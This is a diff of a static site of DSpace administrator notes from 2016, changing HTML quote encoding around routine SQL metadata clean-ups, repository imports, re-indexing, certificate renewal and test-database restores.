<li>And <code>dc.identifier.fund</code> is MOSTLY used for CPWF project identifier but has some other sponsorship things
@ -281,17 +281,17 @@ fi
</ul>
</li>
</ul>
<pre tabindex="0"><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
<pre tabindex="0"><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like &#39;PN%&#39; or text_value like &#39;PHASE%&#39; or text_value = &#39;CBA&#39; or text_value = &#39;IA&#39;);
</code></pre><h2 id="2016-05-20">2016-05-20</h2>
<ul>
<li>More work on CCAFS Video and Images records</li>
<li>For SAFBuilder we need to modify filename column to have the thumbnail bundle:</li>
</ul>
<pre tabindex="0"><code>value + &quot;__bundle:THUMBNAIL&quot;
<pre tabindex="0"><code>value + &#34;__bundle:THUMBNAIL&#34;
</code></pre><ul>
<li>Also, I fixed some weird characters using OpenRefine&rsquo;s transform with the following GREL:</li>
</ul>
<pre tabindex="0"><code>value.replace(/\u0081/,'')
<pre tabindex="0"><code>value.replace(/\u0081/,&#39;&#39;)
</code></pre><ul>
<li>Write shell script to resize thumbnails with height larger than 400: <a href="https://gist.github.com/alanorth/131401dcd39d00e0ce12e1be3ed13256">https://gist.github.com/alanorth/131401dcd39d00e0ce12e1be3ed13256</a></li>
<li>Upload 707 CCAFS records to DSpace Test</li>
@ -314,7 +314,7 @@ $ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~
</code></pre><ul>
<li>And then import to CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &amp;&gt; /tmp/ccafs-images-may30.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &amp;&gt; /tmp/ccafs-images-may30.log
</code></pre><ul>
<li>But now we have double authors for &ldquo;CGIAR Research Program on Climate Change, Agriculture and Food Security&rdquo; in the authority</li>
<li>I&rsquo;m trying to do a Discovery index before messing with the authority index</li>
@ -322,12 +322,12 @@ $ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~
<li>Run system updates on DSpace Test, re-deploy code, and reboot the server</li>
<li>Clean up and import ~200 CTA records to CGSpace via CSV like:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34;
$ /home/cgspace.cgiar.org/bin/dspace metadata-import -e aorth@mjanja.ch -f ~/CTA-May30/CTA-42229.csv &amp;&gt; ~/CTA-May30/CTA-42229.log
</code></pre><ul>
<li>Discovery indexing took a few hours for some reason, and after that I started the <code>index-authority</code> script</li>
</ul>
<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; /home/cgspace.cgiar.org/bin/dspace index-authority
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace index-authority
</code></pre><h2 id="2016-05-31">2016-05-31</h2>
<ul>
<li>The <code>index-authority</code> script ran over night and was finished in the morning</li>


@ -34,7 +34,7 @@ This is their publications set: http://ebrary.ifpri.org/oai/oai.php?verb=ListRec
You can see the others by using the OAI ListSets verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets
Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in dc.identifier.fund to cg.identifier.cpwfproject and then the rest to dc.description.sponsorship
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -129,7 +129,7 @@ Working on second phase of metadata migration, looks like this will work for mov
<li>You can see the others by using the OAI <code>ListSets</code> verb: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListSets">http://ebrary.ifpri.org/oai/oai.php?verb=ListSets</a></li>
<li>Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in <code>dc.identifier.fund</code> to <code>cg.identifier.cpwfproject</code> and then the rest to <code>dc.description.sponsorship</code></li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
<pre tabindex="0"><code>dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like &#39;PN%&#39; or text_value like &#39;PHASE%&#39; or text_value = &#39;CBA&#39; or text_value = &#39;IA&#39;);
UPDATE 497
dspacetest=# update metadatavalue set metadata_field_id=29 where metadata_field_id=75;
UPDATE 14
@ -160,7 +160,7 @@ CGIAR Research Program on Climate Change, Agriculture and Food Security::acd0076
<li>So the only difference is the &ldquo;confidence&rdquo;</li>
<li>Ok, well THAT is interesting:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, A. | ab606e3a-2b04-4c7d-9423-14beccf54257 | -1
@ -180,13 +180,13 @@ CGIAR Research Program on Climate Change, Agriculture and Food Security::acd0076
</code></pre><ul>
<li>And now an actually relevant example:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence = 500;
<pre tabindex="0"><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39; and confidence = 500;
count
-------
707
(1 row)
dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence != 500;
dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39; and confidence != 500;
count
-------
253
@ -194,7 +194,7 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and te
</code></pre><ul>
<li>Trying something experimental:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
UPDATE 960
</code></pre><ul>
<li>And then re-indexing authority and Discovery&hellip;?</li>
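<li>A sketch of those two steps, using the same invocations as elsewhere in these notes:</li>
</ul>
<pre tabindex="0"><code>$ ~/dspace/bin/dspace index-authority
$ ~/dspace/bin/dspace index-discovery -bf
</code></pre>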
@ -244,7 +244,7 @@ UPDATE 960
<li>Looks like this is all we need: <a href="https://wiki.lyrasis.org/display/DSDOC5x/Submission+User+Interface#SubmissionUserInterface-ConfiguringControlledVocabularies">https://wiki.lyrasis.org/display/DSDOC5x/Submission+User+Interface#SubmissionUserInterface-ConfiguringControlledVocabularies</a></li>
<li>I wrote an XPath expression to extract the ILRI subjects from <code>input-forms.xml</code> (from the xmlstarlet package):</li>
</ul>
<pre tabindex="0"><code>$ xml sel -t -m '//value-pairs[@value-pairs-name=&quot;ilrisubject&quot;]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
<pre tabindex="0"><code>$ xml sel -t -m &#39;//value-pairs[@value-pairs-name=&#34;ilrisubject&#34;]/pair/displayed-value/text()&#39; -c &#39;.&#39; -n dspace/config/input-forms.xml
</code></pre><ul>
<li>Write to Atmire about the use of <code>atmire.orcid.id</code> to see if we can change it</li>
<li>Seems to be a virtual field that is queried from the authority cache&hellip; hmm</li>
@ -263,9 +263,9 @@ UPDATE 960
<li>It looks like the values are documented in <code>Choices.java</code></li>
<li>Experiment with setting all 960 CCAFS author values to be 500:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
<pre tabindex="0"><code>dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
UPDATE 960
</code></pre><ul>
<li>After the database edit, I did a full Discovery re-index</li>
@ -320,7 +320,7 @@ UPDATE 960
<ul>
<li>CGSpace&rsquo;s HTTPS certificate expired last night and I didn&rsquo;t notice, had to renew:</li>
</ul>
<pre tabindex="0"><code># /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook &quot;/usr/bin/service nginx stop&quot; --post-hook &quot;/usr/bin/service nginx start&quot;
<pre tabindex="0"><code># /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook &#34;/usr/bin/service nginx stop&#34; --post-hook &#34;/usr/bin/service nginx start&#34;
</code></pre><ul>
<li>I really need to fix that cron job&hellip;</li>
</ul>
@ -328,8 +328,8 @@ UPDATE 960
<ul>
<li>Run the replacements/deletes for <code>dc.description.sponsorship</code> (investors) on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t 'correct investor' -m 29 -d cgspace -p 'fuuu' -u cgspace
$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p 'fuuu' -u cgspace
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t &#39;correct investor&#39; -m 29 -d cgspace -p &#39;fuuu&#39; -u cgspace
$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p &#39;fuuu&#39; -u cgspace
</code></pre><ul>
<li>The scripts for this are here:
<ul>
@ -367,9 +367,9 @@ $ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.spons
</code></pre><ul>
<li>Run all cleanups and deletions of <code>dc.contributor.corporate</code> on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t 'Correct style' -m 126 -d cgspace -u cgspace -p 'fuuu'
$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t 'should be' -m 126 -d cgspace -u cgspace -p 'fuuu'
$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t &#39;Correct style&#39; -m 126 -d cgspace -u cgspace -p &#39;fuuu&#39;
$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t &#39;should be&#39; -m 126 -d cgspace -u cgspace -p &#39;fuuu&#39;
$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Re-deploy CGSpace and DSpace Test with latest June changes</li>
<li>Now the sharing and Altmetric bits are more prominent:</li>
@ -383,11 +383,11 @@ $ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-D
<ul>
<li>Wow, there are 95 authors in the database who have &lsquo;,&rsquo; at the end of their name:</li>
</ul>
<pre tabindex="0"><code># select text_value from metadatavalue where metadata_field_id=3 and text_value like '%,';
<pre tabindex="0"><code># select text_value from metadatavalue where metadata_field_id=3 and text_value like &#39;%,&#39;;
</code></pre><ul>
<li>We need to use something like this to fix them, need to write a proper regex later:</li>
</ul>
<pre tabindex="0"><code># update metadatavalue set text_value = regexp_replace(text_value, '(Poole, J),', '\1') where metadata_field_id=3 and text_value = 'Poole, J,';
<pre tabindex="0"><code># update metadatavalue set text_value = regexp_replace(text_value, &#39;(Poole, J),&#39;, &#39;\1&#39;) where metadata_field_id=3 and text_value = &#39;Poole, J,&#39;;
</code></pre>


@ -44,7 +44,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
In this case the select query was showing 95 results before the update
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -135,9 +135,9 @@ In this case the select query was showing 95 results before the update
<li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li>
<li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
UPDATE 95
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
text_value
------------
(0 rows)
@ -158,7 +158,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
<li>We <em>really</em> only need <code>statistics</code> and <code>authority</code> but meh</li>
<li>Fix metadata for species on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p &#39;fuuu&#39;
</code></pre><ul>
<li>Will run later on CGSpace</li>
<li>A user is still having problems with Sherpa/Romeo causing crashes during the submission process when the journal is &ldquo;ungraded&rdquo;</li>
@ -169,7 +169,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
<ul>
<li>Delete 23 blank metadata values from CGSpace:</li>
</ul>
<pre tabindex="0"><code>cgspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>cgspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 23
</code></pre><ul>
<li>Complete phase three of metadata migration, for the following fields:
@ -188,9 +188,9 @@ DELETE 23
</li>
<li>Also, run fixes and deletes for species and author affiliations (over 1000 corrections!)</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p 'fuuu'
$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p 'fuuu'
$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>I then ran all server updates and rebooted the server</li>
</ul>
@ -221,7 +221,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
</code></pre><ul>
<li>I suspect it&rsquo;s someone hitting REST too much:</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
710 66.249.78.38
1781 181.118.144.29
24904 70.32.99.142


@ -42,7 +42,7 @@ $ git checkout -b 55new 5_x-prod
$ git reset --hard ilri/5_x-prod
$ git rebase -i dspace-5.5
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -166,7 +166,7 @@ $ git rebase -i dspace-5.5
<li>Fix item display incorrectly displaying Species when Breeds were present (<a href="https://github.com/ilri/DSpace/pull/260">#260</a>)</li>
<li>Experiment with fixing more authors, like Delia Grace:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where metadata_field_id=3 and text_value='Grace, D.';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#39;, confidence=600 where metadata_field_id=3 and text_value=&#39;Grace, D.&#39;;
</code></pre><h2 id="2016-08-06">2016-08-06</h2>
<ul>
<li>Finally figured out how to remove &ldquo;View/Open&rdquo; and &ldquo;Bitstreams&rdquo; from the item view</li>
@ -184,8 +184,8 @@ $ git rebase -i dspace-5.5
<li>Install latest Oracle Java 8 JDK</li>
<li>Create <code>setenv.sh</code> in Tomcat 8 <code>libexec/bin</code> directory:</li>
</ul>
<pre tabindex="0"><code>CATALINA_OPTS=&quot;-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8&quot;
CATALINA_OPTS=&quot;$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib&quot;
<pre tabindex="0"><code>CATALINA_OPTS=&#34;-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8&#34;
CATALINA_OPTS=&#34;$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib&#34;
JRE_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_102.jdk/Contents/Home
</code></pre><ul>
@ -246,7 +246,7 @@ $ ln -sv ~/dspace/webapps/solr /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/sol
<li>Fix &ldquo;CONGO,DR&rdquo; country name in <code>input-forms.xml</code> (<a href="https://github.com/ilri/DSpace/pull/264">#264</a>)</li>
<li>Also need to fix existing records using the incorrect form in the database:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value='CONGO, DR' where resource_type_id=2 and metadata_field_id=228 and text_value='CONGO,DR';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;CONGO, DR&#39; where resource_type_id=2 and metadata_field_id=228 and text_value=&#39;CONGO,DR&#39;;
</code></pre><ul>
<li>I asked a question on the DSpace mailing list about updating &ldquo;preferred&rdquo; forms of author names from ORCID</li>
</ul>
@ -300,12 +300,12 @@ Database Driver: PostgreSQL Native Driver version PostgreSQL 9.1 JDBC4 (build 90
<li>Talk to Atmire about the DSpace 5.5 issue, and it seems to be caused by a bug in FlywayDB</li>
<li>They said I should delete the Atmire migrations</li>
</ul>
<pre tabindex="0"><code>dspacetest=# delete from schema_version where description = 'Atmire CUA 4 migration' and version='5.1.2015.12.03.2';
dspacetest=# delete from schema_version where description = 'Atmire MQM migration' and version='5.1.2015.12.03.3';
<pre tabindex="0"><code>dspacetest=# delete from schema_version where description = &#39;Atmire CUA 4 migration&#39; and version=&#39;5.1.2015.12.03.2&#39;;
dspacetest=# delete from schema_version where description = &#39;Atmire MQM migration&#39; and version=&#39;5.1.2015.12.03.3&#39;;
</code></pre><ul>
<li>After that DSpace starts up, but XMLUI now has unrelated issues that I need to solve!</li>
</ul>
<pre tabindex="0"><code>org.apache.avalon.framework.configuration.ConfigurationException: Type 'ThemeResourceReader' does not exist for 'map:read' at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
<pre tabindex="0"><code>org.apache.avalon.framework.configuration.ConfigurationException: Type &#39;ThemeResourceReader&#39; does not exist for &#39;map:read&#39; at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
</code></pre><ul>
<li>Looks like we&rsquo;re missing some stuff in the XMLUI module&rsquo;s <code>sitemap.xmap</code>, as well as in each of our XMLUI themes</li>
@ -324,13 +324,13 @@ context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
<li>Clean up and import 48 CCAFS records into DSpace Test</li>
<li>SQL to get all journal titles from dc.source (55), since it&rsquo;s apparently used for internal DSpace filename shit, but we moved all our journal titles there a few months ago:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ '.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*';
<pre tabindex="0"><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ &#39;.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*&#39;;
</code></pre><h2 id="2016-08-25">2016-08-25</h2>
<ul>
<li>Atmire suggested adding a missing bean to <code>dspace/config/spring/api/atmire-cua.xml</code> but it doesn&rsquo;t help:</li>
</ul>
<pre tabindex="0"><code>...
Error creating bean with name 'MetadataStorageInfoService'
Error creating bean with name &#39;MetadataStorageInfoService&#39;
...
</code></pre><ul>
<li>Atmire sent an updated version of <code>dspace/config/spring/api/atmire-cua.xml</code> and now XMLUI starts but gives a null pointer exception:</li>
@ -351,7 +351,7 @@ Error creating bean with name 'MetadataStorageInfoService'
<li>Import the 47 CCAFS records to CGSpace, creating the SimpleArchiveFormat bundles and importing like:</li>
</ul>
<pre tabindex="0"><code>$ ./safbuilder.sh -c /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/3546.csv
$ JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
$ JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
</code></pre><ul>
<li>Finally got DSpace 5.5 working with the Atmire modules after a few rounds of back and forth with Atmire devs</li>
</ul>


@ -14,7 +14,7 @@ Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure
We had been using DC=ILRI to determine whether a user was ILRI or not
It looks like we might be able to use OUs now, instead of DCs:
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-09/" />
@ -32,9 +32,9 @@ Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure
We had been using DC=ILRI to determine whether a user was ILRI or not
It looks like we might be able to use OUs now, instead of DCs:
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -127,7 +127,7 @@ $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=or
<li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li>
<li>It looks like we might be able to use OUs now, instead of DCs:</li>
</ul>
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
</code></pre><ul>
<li>User who has been migrated to the root vs user still in the hierarchical structure:</li>
</ul>
@ -142,15 +142,15 @@ distinguishedName: CN=Last\, First (ILRI),OU=ILRI Ethiopia Employees,OU=ILRI Eth
</ul>
<pre tabindex="0"><code>$ dropdb dspacetest
$ createdb -O dspacetest --encoding=UNICODE dspacetest
$ psql dspacetest -c 'alter user dspacetest createuser;'
$ psql dspacetest -c &#39;alter user dspacetest createuser;&#39;
$ pg_restore -O -U dspacetest -d dspacetest ~/Downloads/cgspace_2016-09-01.backup
$ psql dspacetest -c 'alter user dspacetest nocreateuser;'
$ psql dspacetest -c &#39;alter user dspacetest nocreateuser;&#39;
$ psql -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -h localhost
$ vacuumdb dspacetest
</code></pre><ul>
<li>Some names that I thought I fixed in July seem not to be:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Poole, %&#39;;
text_value | authority | confidence
-----------------------+--------------------------------------+------------
Poole, Elizabeth Jane | b6efa27f-8829-4b92-80fe-bc63e03e3ccb | 600
@ -163,12 +163,12 @@ $ vacuumdb dspacetest
</code></pre><ul>
<li>At least a few of these actually have the correct ORCID, but I will unify the authority to be c3a22456-8d6a-41f9-bba0-de51ef564d45</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority='c3a22456-8d6a-41f9-bba0-de51ef564d45', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;c3a22456-8d6a-41f9-bba0-de51ef564d45&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Poole, %&#39;;
UPDATE 69
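-- hypothetical sanity check: after the update only one authority should remain
dspacetest=# select authority, count(*) from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %' group by authority;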
</code></pre><ul>
<li>And for Peter Ballantyne:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Ballantyne, %&#39;;
text_value | authority | confidence
-------------------+--------------------------------------+------------
Ballantyne, Peter | 2dcbcc7b-47b0-4fd7-bef9-39d554494081 | 600
@ -180,26 +180,26 @@ UPDATE 69
</code></pre><ul>
<li>Again, a few have the correct ORCID, but there should only be one authority&hellip;</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority='4f04ca06-9a76-4206-bd9c-917ca75d278e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;4f04ca06-9a76-4206-bd9c-917ca75d278e&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Ballantyne, %&#39;;
UPDATE 58
</code></pre><ul>
<li>And for me:</li>
</ul>
